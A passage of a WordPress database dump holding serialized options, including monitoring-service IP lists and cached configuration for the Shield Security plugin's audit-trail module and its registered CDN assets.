";i:64;s:13:\"52.36.167.221\";i:65;s:11:\"52.53.133.6\";i:66;s:12:\"52.54.150.82\";i:67;s:12:\"52.57.221.37\";i:68;s:13:\"52.59.173.230\";i:69;s:11:\"52.62.14.35\";i:70;s:12:\"52.62.203.73\";i:71;s:11:\"52.63.106.9\";i:72;s:12:\"52.63.119.77\";i:73;s:13:\"52.65.161.237\";i:74;s:12:\"52.73.161.98\";i:75;s:13:\"52.74.114.251\";i:76;s:11:\"52.74.98.83\";i:77;s:12:\"52.76.14.176\";i:78;s:13:\"52.76.156.251\";i:79;s:13:\"52.76.174.156\";i:80;s:11:\"52.77.80.43\";i:81;s:10:\"52.8.19.58\";i:82;s:10:\"52.8.8.189\";i:83;s:13:\"54.149.153.72\";i:84;s:13:\"54.152.36.104\";i:85;s:13:\"54.183.95.195\";i:86;s:14:\"54.187.182.230\";i:87;s:13:\"54.187.199.38\";i:88;s:14:\"54.187.208.163\";i:89;s:14:\"54.238.140.239\";i:90;s:13:\"54.65.115.204\";i:91;s:11:\"54.65.97.98\";i:92;s:12:\"54.67.48.128\";i:93;s:12:\"54.67.52.245\";i:94;s:13:\"54.68.165.206\";i:95;s:13:\"54.68.183.151\";i:96;s:13:\"107.23.48.182\";i:97;s:13:\"107.23.48.232\";i:98;s:10:\"3.18.12.63\";i:99;s:13:\"3.130.192.231\";i:100;s:13:\"13.235.14.237\";i:101;s:14:\"13.235.122.149\";i:102;s:13:\"18.211.135.69\";i:103;s:14:\"35.154.171.200\";i:104;s:12:\"52.15.183.38\";i:105;s:13:\"54.88.130.119\";i:106;s:13:\"54.88.130.237\";i:107;s:14:\"54.187.174.169\";i:108;s:14:\"54.187.205.235\";i:109;s:13:\"54.187.216.72\";}i:6;a:0:{}}s:11:\"uptimerobot\";a:2:{i:4;a:70:{i:0;s:15:\"216.144.250.150\";i:1;s:14:\"69.162.124.226\";i:2;s:14:\"69.162.124.227\";i:3;s:14:\"69.162.124.228\";i:4;s:14:\"69.162.124.229\";i:5;s:14:\"69.162.124.230\";i:6;s:14:\"69.162.124.231\";i:7;s:14:\"69.162.124.232\";i:8;s:14:\"69.162.124.233\";i:9;s:14:\"69.162.124.234\";i:10;s:14:\"69.162.124.235\";i:11;s:14:\"69.162.124.236\";i:12;s:14:\"69.162.124.237\";i:13;s:13:\"63.143.42.242\";i:14;s:13:\"63.143.42.243\";i:15;s:13:\"63.143.42.244\";i:16;s:13:\"63.143.42.245\";i:17;s:13:\"63.143.42.246\";i:18;s:13:\"63.143.42.247\";i:19;s:13:\"63.143.42.248\";i:20;s:13:\"63.143.42.249\";i:21;s:13:\"63.143.42.250\";i:22;s:13:\"63.143.42.251\";i:23;s:13:\"63.143.42.252\";i:24;s:13:\"63.143.42.253\";i:25;s:14:\"216.245.221.82\";i:26;s:14:\"216.245.221.83\";i:27;s:14:\"216.245.221.84\";i:28;s:14:\"216.245.221.85\";i:29;s:14:\"216.245.221.86\";i:30;s:14:\"216.245.221.87\";i:31;s:14:\"216.245.221.88\";i:32;s:14:\"216.245.221.89\";i:33;s:14:\"216.245.221.90\";i:34;s:14:\"216.245.221.91\";i:35;s:14:\"216.245.221.92\";i:36;s:14:\"216.245.221.93\";i:37;s:14:\"208.115.199.18\";i:38;s:14:\"208.115.199.19\";i:39;s:14:\"208.115.199.20\";i:40;s:14:\"208.115.199.21\";i:41;s:14:\"208.115.199.22\";i:42;s:14:\"208.115.199.23\";i:43;s:14:\"208.115.199.24\";i:44;s:14:\"208.115.199.25\";i:45;s:14:\"208.115.199.26\";i:46;s:14:\"208.115.199.27\";i:47;s:14:\"208.115.199.28\";i:48;s:14:\"208.115.199.29\";i:49;s:14:\"208.115.199.30\";i:50;s:14:\"46.137.190.132\";i:51;s:14:\"122.248.234.23\";i:52;s:14:\"167.99.209.234\";i:53;s:13:\"178.62.52.237\";i:54;s:12:\"54.79.28.129\";i:55;s:13:\"54.94.142.218\";i:56;s:14:\"104.131.107.63\";i:57;s:12:\"54.67.10.127\";i:58;s:12:\"54.64.67.106\";i:59;s:13:\"159.203.30.41\";i:60;s:14:\"46.101.250.135\";i:61;s:12:\"18.221.56.27\";i:62;s:13:\"52.60.129.180\";i:63;s:12:\"159.89.8.111\";i:64;s:14:\"146.185.143.14\";i:65;s:14:\"139.59.173.249\";i:66;s:14:\"165.227.83.148\";i:67;s:15:\"128.199.195.156\";i:68;s:15:\"138.197.150.151\";i:69;s:13:\"34.233.66.117\";}i:6;a:67:{i:70;s:16:\"2607:ff68:107::3\";i:71;s:16:\"2607:ff68:107::4\";i:72;s:16:\"2607:ff68:107::5\";i:73;s:16:\"2607:ff68:107::6\";i:74;s:16:\"2607:ff68:107::7\";i:75;s:16:\"2607:ff68:107::8\";i:76;s:16:\"2607:ff68:107::9\";i:77;s:17:\"2607:ff68:107::10\";i:78;s:17:\"2607:ff68:107::11\";i:79;s:17:\"2607:ff68:107::12\";i:80;s:17:\"2607:ff68:107::13\";i:81;s:17:\"2607:ff68:107::14\";i:82;s:17:\"2607:ff68:107::15\";i:83;s:17:\"2607:ff68:107::16\";i:84;s:17:\"2607:ff68:107::17\";i:85;s:17:\"2607:ff68:107::18\";i:86;s:17:\"2607:ff68:107::19\";i:87;s:17:\"2607:ff68:107::20\";i:88;s:17:\"2607:ff68:107::21\";i:89;s:17:\"2607:ff68:107::22\";i:90;s:17:\"2607:ff68:107::23\";i:91;s:17:\"2607:ff68:107::24\";i:92;s:17:\"2607:ff68:107::25\";i:93;s:17:\"2607:ff68:107::26\";i:94;s:17:\"2607:ff68:107::27\";i:95;s:17:\"2607:ff68:107::28\";i:96;s:17:\"2607:ff68:107::29\";i:97;s:17:\"2607:ff68:107::30\";i:98;s:17:\"2607:ff68:107::31\";i:99;s:17:\"2607:ff68:107::32\";i:100;s:17:\"2607:ff68:107::33\";i:101;s:17:\"2607:ff68:107::34\";i:102;s:17:\"2607:ff68:107::35\";i:103;s:17:\"2607:ff68:107::36\";i:104;s:17:\"2607:ff68:107::37\";i:105;s:17:\"2607:ff68:107::38\";i:106;s:17:\"2607:ff68:107::39\";i:107;s:17:\"2607:ff68:107::40\";i:108;s:17:\"2607:ff68:107::41\";i:109;s:17:\"2607:ff68:107::42\";i:110;s:17:\"2607:ff68:107::43\";i:111;s:17:\"2607:ff68:107::44\";i:112;s:17:\"2607:ff68:107::45\";i:113;s:17:\"2607:ff68:107::46\";i:114;s:17:\"2607:ff68:107::47\";i:115;s:17:\"2607:ff68:107::48\";i:116;s:17:\"2607:ff68:107::49\";i:117;s:17:\"2607:ff68:107::50\";i:118;s:17:\"2607:ff68:107::51\";i:119;s:17:\"2607:ff68:107::52\";i:120;s:17:\"2607:ff68:107::53\";i:121;s:17:\"2607:ff68:107::54\";i:122;s:17:\"2607:ff68:107::55\";i:123;s:24:\"2a03:b0c0:2:d0::fa3:e001\";i:124;s:24:\"2a03:b0c0:1:d0::e54:a001\";i:125;s:26:\"2604:a880:800:10::4e6:f001\";i:126;s:26:\"2604:a880:cad:d0::122:7001\";i:127;s:24:\"2a03:b0c0:3:d0::33e:4001\";i:128;s:38:\"2600:1f16:775:3a01:70d6:601a:1eb5:dbb9\";i:129;s:36:\"2600:1f11:56a:9000:23:651b:dac0:9be4\";i:130;s:23:\"2a03:b0c0:3:d0::44:f001\";i:131;s:25:\"2a03:b0c0:0:1010::2b:b001\";i:132;s:23:\"2a03:b0c0:1:d0::22:5001\";i:133;s:25:\"2604:a880:400:d0::4f:3001\";i:134;s:23:\"2400:6180:0:d0::16:d001\";i:135;s:25:\"2604:a880:cad:d0::18:f001\";i:136;s:37:\"2600:1f18:179:f900:88b2:b3d:e487:e2f4\";}}}','no'),(439285,'hustle_notice_stop_support_m2','a:0:{}','yes'),(435661,'recovery_keys','a:0:{}','yes'),(435832,'_transient_health-check-site-status-result','{\"good\":\"12\",\"recommended\":\"7\",\"critical\":\"1\"}','yes'),(510290,'_site_transient_timeout_icwp-wpsf-releases','1632920389','no'),(510291,'_site_transient_icwp-wpsf-releases','a:30:{i:0;s:6:\"12.0.3\";i:1;s:6:\"12.0.2\";i:2;s:6:\"12.0.1\";i:3;s:6:\"12.0.0\";i:4;s:6:\"11.5.5\";i:5;s:6:\"11.5.4\";i:6;s:6:\"11.5.3\";i:7;s:6:\"11.5.2\";i:8;s:6:\"11.5.1\";i:9;s:6:\"11.5.0\";i:10;s:6:\"11.4.5\";i:11;s:6:\"11.4.4\";i:12;s:6:\"11.4.3\";i:13;s:6:\"11.4.2\";i:14;s:6:\"11.4.1\";i:15;s:6:\"11.4.0\";i:16;s:6:\"11.3.0\";i:17;s:6:\"11.2.4\";i:18;s:6:\"11.2.3\";i:19;s:6:\"11.2.2\";i:20;s:6:\"11.2.1\";i:21;s:6:\"11.2.0\";i:22;s:6:\"11.1.1\";i:23;s:6:\"11.1.0\";i:24;s:6:\"11.0.3\";i:25;s:6:\"11.0.2\";i:26;s:6:\"11.0.1\";i:27;s:6:\"11.0.0\";i:28;s:6:\"10.2.6\";i:29;s:6:\"10.2.4\";}','no'),(468215,'_site_transient_shield_mod_config_cb9d9aea63f985b43df6919c165acb26','a:8:{s:4:\"slug\";s:11:\"audit_trail\";s:10:\"properties\";a:14:{s:4:\"slug\";s:11:\"audit_trail\";s:4:\"name\";s:11:\"Audit Trail\";s:12:\"sidebar_name\";s:11:\"Audit Trail\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:11:\"audit_trail\";s:7:\"tagline\";s:50:\"Track All Site Activity: Who, What, When and Where\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:110;}s:10:\"menu_items\";a:1:{i:0;a:2:{s:5:\"title\";s:11:\"Audit Trail\";s:4:\"slug\";s:14:\"audit-redirect\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:14:\"audit-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:5:\"audit\";}}}s:8:\"sections\";a:4:{i:0;a:6:{s:4:\"slug\";s:27:\"section_audit_trail_options\";s:7:\"primary\";b:1;s:5:\"title\";s:19:\"Audit Trail Options\";s:11:\"title_short\";s:7:\"Options\";s:9:\"beacon_id\";i:241;s:7:\"summary\";a:2:{i:0;s:61:\"Purpose - Provides finer control over the audit trail itself.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:1;a:5:{s:4:\"slug\";s:23:\"section_change_tracking\";s:6:\"hidden\";b:1;s:5:\"title\";s:15:\"Change Tracking\";s:11:\"title_short\";s:15:\"Change Tracking\";s:7:\"summary\";a:2:{i:0;s:49:\"Purpose - Track significant changes to your site.\";i:1;s:55:\"Recommendation - Keep this Reporting feature turned on.\";}}i:2;a:5:{s:4:\"slug\";s:41:\"section_enable_plugin_feature_audit_trail\";s:5:\"title\";s:26:\"Enable Module: Audit Trail\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:241;s:7:\"summary\";a:2:{i:0;s:124:\"Purpose - The Audit Trail is designed so you can look back on events and analyse what happened and what may have gone wrong.\";i:1;s:56:\"Recommendation - Keep the Audit Trail feature turned on.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:7:{i:0;a:11:{s:3:\"key\";s:18:\"enable_audit_trail\";s:7:\"section\";s:41:\"section_enable_plugin_feature_audit_trail\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/5p\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:9:\"beacon_id\";i:241;s:4:\"name\";s:18:\"Enable Audit Trail\";s:7:\"summary\";s:42:\"Enable (or Disable) The Audit Trail module\";s:11:\"description\";s:70:\"Un-Checking this option will completely disable the Audit Trail module\";}i:1;a:11:{s:3:\"key\";s:22:\"audit_trail_auto_clean\";s:7:\"section\";s:27:\"section_audit_trail_options\";s:7:\"default\";i:14;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/a2\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:9:\"beacon_id\";i:375;s:4:\"name\";s:10:\"Auto Clean\";s:7:\"summary\";s:26:\"Enable Audit Auto Cleaning\";s:11:\"description\";s:94:\"Events older than the number of days specified will be automatically cleaned from the database\";}i:2;a:12:{s:3:\"key\";s:23:\"audit_trail_max_entries\";s:7:\"section\";s:27:\"section_audit_trail_options\";s:7:\"premium\";b:1;s:7:\"default\";i:1000;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/hc\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:128;s:4:\"name\";s:16:\"Max Trail Length\";s:7:\"summary\";s:34:\"Maximum Audit Trail Length To Keep\";s:11:\"description\";s:73:\"Automatically remove any audit trail entries when this limit is exceeded.\";}i:3;a:10:{s:3:\"key\";s:22:\"enable_change_tracking\";s:7:\"section\";s:23:\"section_change_tracking\";s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"enabled\";s:4:\"text\";s:7:\"Enabled\";}i:2;a:2:{s:9:\"value_key\";s:18:\"enabled_with_email\";s:4:\"text\";s:26:\"Enabled With Email Reports\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Enable Change Tracking\";s:7:\"summary\";s:32:\"Track Major Changes To Your Site\";s:11:\"description\";s:85:\"Tracking major changes to your site will help you monitor and catch malicious damage.\";}i:4;a:10:{s:3:\"key\";s:21:\"ct_snapshots_per_week\";s:7:\"section\";s:23:\"section_change_tracking\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:7;s:3:\"min\";i:1;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Snapshot Per Week\";s:7:\"summary\";s:36:\"Number Of Snapshots To Take Per Week\";s:11:\"description\";s:72:\"The number of snapshots to take per week. For daily snapshots, select 7.\";}i:5;a:10:{s:3:\"key\";s:16:\"ct_max_snapshots\";s:7:\"section\";s:23:\"section_change_tracking\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:28;s:3:\"min\";i:1;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Snapshot Per Week\";s:7:\"summary\";s:36:\"Number Of Snapshots To Take Per Week\";s:11:\"description\";s:72:\"The number of snapshots to take per week. For daily snapshots, select 7.\";}i:6;a:5:{s:3:\"key\";s:19:\"ct_last_snapshot_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}}s:11:\"definitions\";a:5:{s:10:\"db_classes\";a:1:{s:11:\"audit_trail\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\AuditTrail\\Handler\";}s:20:\"db_table_audit_trail\";a:3:{s:4:\"slug\";s:11:\"audit_trail\";s:14:\"has_updated_at\";b:1;s:11:\"cols_custom\";a:8:{s:3:\"rid\";s:52:\"varchar(10) NOT NULL DEFAULT \'\' COMMENT \'Request ID\'\";s:2:\"ip\";s:59:\"varchar(40) NOT NULL DEFAULT 0 COMMENT \'Visitor IP Address\'\";s:11:\"wp_username\";s:51:\"varchar(255) NOT NULL DEFAULT \'-\' COMMENT \'WP User\'\";s:7:\"context\";s:59:\"varchar(32) NOT NULL DEFAULT \'none\' COMMENT \'Audit Context\'\";s:5:\"event\";s:66:\"varchar(50) NOT NULL DEFAULT \'none\' COMMENT \'Specific Audit Event\'\";s:8:\"category\";s:53:\"int(3) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Severity\'\";s:4:\"meta\";s:31:\"text COMMENT \'Audit Event Data\'\";s:5:\"count\";s:62:\"SMALLINT(5) UNSIGNED NOT NULL DEFAULT 1 COMMENT \'Repeat Count\'\";}}s:28:\"audit_trail_free_max_entries\";i:100;s:22:\"audit_trail_table_name\";s:11:\"audit_trail\";s:6:\"events\";a:22:{s:16:\"plugin_activated\";a:2:{s:7:\"context\";s:7:\"plugins\";s:14:\"audit_multiple\";b:1;}s:18:\"plugin_deactivated\";a:2:{s:7:\"context\";s:7:\"plugins\";s:14:\"audit_multiple\";b:1;}s:18:\"plugin_file_edited\";a:1:{s:7:\"context\";s:7:\"plugins\";}s:15:\"plugin_upgraded\";a:2:{s:7:\"context\";s:7:\"plugins\";s:14:\"audit_multiple\";b:1;}s:15:\"theme_activated\";a:1:{s:7:\"context\";s:6:\"themes\";}s:17:\"theme_file_edited\";a:1:{s:7:\"context\";s:6:\"themes\";}s:14:\"theme_upgraded\";a:2:{s:7:\"context\";s:6:\"themes\";s:14:\"audit_multiple\";b:1;}s:12:\"core_updated\";a:1:{s:7:\"context\";s:9:\"wordpress\";}s:20:\"permalinks_structure\";a:1:{s:7:\"context\";s:9:\"wordpress\";}s:12:\"post_deleted\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:12:\"post_trashed\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:14:\"post_recovered\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:12:\"post_updated\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:14:\"post_published\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:16:\"post_unpublished\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:10:\"user_login\";a:1:{s:7:\"context\";s:5:\"users\";}s:14:\"user_login_app\";a:1:{s:7:\"context\";s:5:\"users\";}s:15:\"user_registered\";a:1:{s:7:\"context\";s:5:\"users\";}s:12:\"user_deleted\";a:2:{s:7:\"context\";s:5:\"users\";s:14:\"audit_multiple\";b:1;}s:23:\"user_deleted_reassigned\";a:1:{s:7:\"context\";s:5:\"users\";}s:18:\"email_attempt_send\";a:2:{s:7:\"context\";s:6:\"emails\";s:14:\"audit_multiple\";b:1;}s:18:\"email_send_invalid\";a:2:{s:7:\"context\";s:6:\"emails\";s:14:\"audit_multiple\";b:1;}}}s:10:\"meta_modts\";i:1628268100;}','no'),(454647,'_site_transient_aptoweb_controller_c5bfaa','a:14:{s:10:\"properties\";a:17:{s:7:\"version\";s:6:\"12.0.3\";s:17:\"release_timestamp\";i:1632305800;s:5:\"build\";s:11:\"202109.2202\";s:11:\"slug_parent\";s:4:\"icwp\";s:11:\"slug_plugin\";s:4:\"wpsf\";s:10:\"human_name\";s:15:\"Shield Security\";s:10:\"menu_title\";s:6:\"Shield\";s:11:\"text_domain\";s:18:\"wp-simple-firewall\";s:16:\"base_permissions\";s:14:\"manage_options\";s:23:\"wpms_network_admin_only\";b:1;s:15:\"logging_enabled\";b:1;s:21:\"show_dashboard_widget\";b:1;s:19:\"show_admin_bar_menu\";b:1;s:10:\"autoupdate\";s:10:\"confidence\";s:15:\"autoupdate_days\";i:2;s:16:\"options_encoding\";s:4:\"json\";s:14:\"enable_premium\";b:1;}s:12:\"requirements\";a:2:{s:3:\"php\";s:3:\"7.0\";s:9:\"wordpress\";s:3:\"3.7\";}s:12:\"upgrade_reqs\";a:1:{s:4:\"10.0\";a:2:{s:3:\"php\";s:3:\"7.0\";s:2:\"wp\";s:5:\"3.5.2\";}}s:5:\"paths\";a:9:{s:6:\"config\";s:6:\"config\";s:6:\"source\";s:3:\"src\";s:8:\"autoload\";s:23:\"lib/vendor/autoload.php\";s:6:\"assets\";s:9:\"resources\";s:9:\"languages\";s:9:\"languages\";s:9:\"templates\";s:9:\"templates\";s:16:\"custom_templates\";s:16:\"shield_templates\";s:5:\"flags\";s:5:\"flags\";s:5:\"cache\";s:6:\"shield\";}s:8:\"includes\";a:4:{s:5:\"admin\";a:2:{s:3:\"css\";a:1:{i:0;s:13:\"global-plugin\";}s:2:\"js\";a:1:{i:0;s:13:\"global-plugin\";}}s:12:\"plugin_admin\";a:2:{s:3:\"css\";a:6:{i:0;s:7:\"select2\";i:1;s:6:\"plugin\";i:2;s:19:\"jquery/featherlight\";i:3;s:7:\"introjs\";i:4;s:17:\"shield/datatables\";i:5;s:15:\"shield/scanners\";}s:2:\"js\";a:10:{i:0;s:7:\"select2\";i:1;s:6:\"plugin\";i:2;s:19:\"jquery/featherlight\";i:3;s:19:\"jquery/fileDownload\";i:4;s:12:\"shield/tours\";i:5;s:16:\"bootstrap-select\";i:6;s:17:\"shield/datatables\";i:7;s:14:\"shield/traffic\";i:8;s:18:\"shield/audit_trail\";i:9;s:15:\"shield/scanners\";}}s:8:\"frontend\";a:2:{s:3:\"css\";a:0:{}s:2:\"js\";a:0:{}}s:8:\"register\";a:2:{s:3:\"css\";a:21:{s:9:\"bootstrap\";a:1:{s:3:\"url\";s:84:\"https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.6.0/css/bootstrap.min.css\";}s:20:\"bootstrap-datepicker\";a:2:{s:3:\"url\";s:98:\"https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.8.0/css/bootstrap-datepicker.min.css\";s:4:\"deps\";a:1:{i:0;s:9:\"bootstrap\";}}s:16:\"bootstrap-select\";a:2:{s:3:\"url\";s:92:\"https://cdnjs.cloudflare.com/ajax/libs/bootstrap-select/1.13.18/css/bootstrap-select.min.css\";s:4:\"deps\";a:1:{i:0;s:9:\"bootstrap\";}}s:7:\"select2\";a:2:{s:3:\"url\";s:73:\"https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.13/css/select2.min.css\";s:4:\"deps\";a:1:{i:0;s:6:\"plugin\";}}s:20:\"datatables-bootstrap\";a:2:{s:3:\"url\";s:67:\"https://cdn.datatables.net/1.11.0/css/dataTables.bootstrap4.min.css\";s:4:\"deps\";a:1:{i:0;s:9:\"bootstrap\";}}s:22:\"datatables-searchpanes\";a:2:{s:3:\"url\";s:79:\"https://cdn.datatables.net/searchpanes/1.4.0/css/searchPanes.dataTables.min.css\";s:4:\"deps\";a:1:{i:0;s:20:\"datatables-bootstrap\";}}s:17:\"datatables-select\";a:2:{s:3:\"url\";s:69:\"https://cdn.datatables.net/select/1.3.3/css/select.dataTables.min.css\";s:4:\"deps\";a:1:{i:0;s:20:\"datatables-bootstrap\";}}s:18:\"datatables-buttons\";a:2:{s:3:\"url\";s:71:\"https://cdn.datatables.net/buttons/1.7.1/css/buttons.dataTables.min.css\";s:4:\"deps\";a:1:{i:0;s:20:\"datatables-bootstrap\";}}s:13:\"global-plugin\";a:0:{}s:6:\"plugin\";a:1:{s:4:\"deps\";a:2:{i:0;s:9:\"bootstrap\";i:1;s:13:\"global-plugin\";}}s:13:\"shield/wizard\";a:1:{s:4:\"deps\";a:2:{i:0;s:9:\"bootstrap\";i:1;s:13:\"global-plugin\";}}s:19:\"jquery/featherlight\";a:1:{s:3:\"url\";s:79:\"https://cdnjs.cloudflare.com/ajax/libs/featherlight/1.7.13/featherlight.min.css\";}s:8:\"chartist\";a:1:{s:3:\"url\";s:71:\"https://cdnjs.cloudflare.com/ajax/libs/chartist/0.11.4/chartist.min.css\";}s:22:\"chartist-plugin-legend\";a:1:{s:4:\"deps\";a:1:{i:0;s:8:\"chartist\";}}s:7:\"introjs\";a:1:{s:3:\"url\";s:69:\"https://cdnjs.cloudflare.com/ajax/libs/intro.js/3.3.1/introjs.min.css\";}s:13:\"shield/charts\";a:1:{s:4:\"deps\";a:1:{i:0;s:6:\"plugin\";}}s:13:\"shield/dialog\";a:2:{s:4:\"deps\";a:1:{i:0;s:22:\"wp-wp-jquery-ui-dialog\";}s:6:\"footer\";b:1;}s:13:\"shield/mainwp\";a:0:{}s:17:\"shield/datatables\";a:1:{s:4:\"deps\";a:5:{i:0;s:17:\"datatables-select\";i:1;s:18:\"datatables-buttons\";i:2;s:20:\"datatables-bootstrap\";i:3;s:22:\"datatables-searchpanes\";i:4;s:14:\"tp/highlightjs\";}}s:15:\"shield/scanners\";a:1:{s:4:\"deps\";a:4:{i:0;s:17:\"datatables-select\";i:1;s:18:\"datatables-buttons\";i:2;s:20:\"datatables-bootstrap\";i:3;s:14:\"tp/highlightjs\";}}s:14:\"tp/highlightjs\";a:1:{s:3:\"url\";s:81:\"https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.1.0/styles/default.min.css\";}}s:2:\"js\";a:45:{s:9:\"bootstrap\";a:2:{s:3:\"url\";s:89:\"https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.6.0/js/bootstrap.bundle.min.js\";s:4:\"deps\";a:1:{i:0;s:9:\"wp-jquery\";}}s:7:\"select2\";a:2:{s:3:\"url\";s:71:\"https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.13/js/select2.min.js\";s:4:\"deps\";a:1:{i:0;s:6:\"plugin\";}}s:20:\"bootstrap-datepicker\";a:2:{s:3:\"url\";s:96:\"https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.8.0/js/bootstrap-datepicker.min.js\";s:4:\"deps\";a:1:{i:0;s:9:\"bootstrap\";}}s:16:\"bootstrap-select\";a:2:{s:3:\"url\";s:90:\"https://cdnjs.cloudflare.com/ajax/libs/bootstrap-select/1.13.18/js/bootstrap-select.min.js\";s:4:\"deps\";a:1:{i:0;s:9:\"bootstrap\";}}s:10:\"datatables\";a:2:{s:3:\"url\";s:61:\"https://cdn.datatables.net/1.11.0/js/jquery.dataTables.min.js\";s:4:\"deps\";a:2:{i:0;s:9:\"bootstrap\";i:1;s:9:\"wp-jquery\";}}s:20:\"datatables-bootstrap\";a:2:{s:3:\"url\";s:65:\"https://cdn.datatables.net/1.11.0/js/dataTables.bootstrap4.min.js\";s:4:\"deps\";a:1:{i:0;s:10:\"datatables\";}}s:22:\"datatables-searchpanes\";a:2:{s:3:\"url\";s:77:\"https://cdn.datatables.net/searchpanes/1.4.0/js/dataTables.searchPanes.min.js\";s:4:\"deps\";a:1:{i:0;s:20:\"datatables-bootstrap\";}}s:17:\"datatables-select\";a:2:{s:3:\"url\";s:67:\"https://cdn.datatables.net/select/1.3.3/js/dataTables.select.min.js\";s:4:\"deps\";a:1:{i:0;s:20:\"datatables-bootstrap\";}}s:18:\"datatables-buttons\";a:2:{s:3:\"url\";s:69:\"https://cdn.datatables.net/buttons/1.7.1/js/dataTables.buttons.min.js\";s:4:\"deps\";a:1:{i:0;s:20:\"datatables-bootstrap\";}}s:13:\"global-plugin\";a:1:{s:4:\"deps\";a:1:{i:0;s:9:\"wp-jquery\";}}s:6:\"plugin\";a:1:{s:4:\"deps\";a:6:{i:0;s:9:\"bootstrap\";i:1;s:20:\"datatables-bootstrap\";i:2;s:13:\"global-plugin\";i:3;s:17:\"shield/navigation\";i:4;s:10:\"base64.min\";i:5;s:13:\"lz-string.min\";}}s:10:\"base64.min\";a:1:{s:3:\"url\";s:58:\"https://cdn.jsdelivr.net/npm/js-base64@2.6.4/base64.min.js\";}s:13:\"lz-string.min\";a:0:{}s:19:\"jquery/fileDownload\";a:0:{}s:12:\"jquery/steps\";a:1:{s:3:\"url\";s:77:\"https://cdnjs.cloudflare.com/ajax/libs/jquery-steps/1.1.0/jquery.steps.min.js\";}s:19:\"jquery/featherlight\";a:1:{s:3:\"url\";s:78:\"https://cdnjs.cloudflare.com/ajax/libs/featherlight/1.7.13/featherlight.min.js\";}s:8:\"chartist\";a:1:{s:3:\"url\";s:70:\"https://cdnjs.cloudflare.com/ajax/libs/chartist/0.11.4/chartist.min.js\";}s:22:\"chartist-plugin-legend\";a:1:{s:4:\"deps\";a:1:{i:0;s:8:\"chartist\";}}s:7:\"introjs\";a:1:{s:3:\"url\";s:66:\"https://cdnjs.cloudflare.com/ajax/libs/intro.js/3.3.1/intro.min.js\";}s:13:\"shield/charts\";a:1:{s:4:\"deps\";a:3:{i:0;s:8:\"chartist\";i:1;s:22:\"chartist-plugin-legend\";i:2;s:6:\"plugin\";}}s:7:\"shuffle\";a:1:{s:3:\"url\";s:67:\"https://cdnjs.cloudflare.com/ajax/libs/Shuffle/5.3.0/shuffle.min.js\";}s:14:\"shield/shuffle\";a:1:{s:4:\"deps\";a:1:{i:0;s:7:\"shuffle\";}}s:13:\"shield/dialog\";a:1:{s:4:\"deps\";a:1:{i:0;s:19:\"wp-jquery-ui-dialog\";}}s:15:\"shield/comments\";a:2:{s:4:\"deps\";a:1:{i:0;s:9:\"wp-jquery\";}s:6:\"footer\";b:1;}s:15:\"shield/loginbot\";a:1:{s:4:\"deps\";a:1:{i:0;s:9:\"wp-jquery\";}}s:17:\"shield/navigation\";a:0:{}s:15:\"shield/secadmin\";a:1:{s:4:\"deps\";a:1:{i:0;s:9:\"wp-jquery\";}}s:13:\"shield/tables\";a:1:{s:4:\"deps\";a:1:{i:0;s:6:\"plugin\";}}s:18:\"shield/audit_trail\";a:1:{s:4:\"deps\";a:1:{i:0;s:17:\"shield/datatables\";}}s:14:\"shield/traffic\";a:1:{s:4:\"deps\";a:1:{i:0;s:17:\"shield/datatables\";}}s:17:\"shield/datatables\";a:1:{s:4:\"deps\";a:5:{i:0;s:17:\"datatables-select\";i:1;s:18:\"datatables-buttons\";i:2;s:20:\"datatable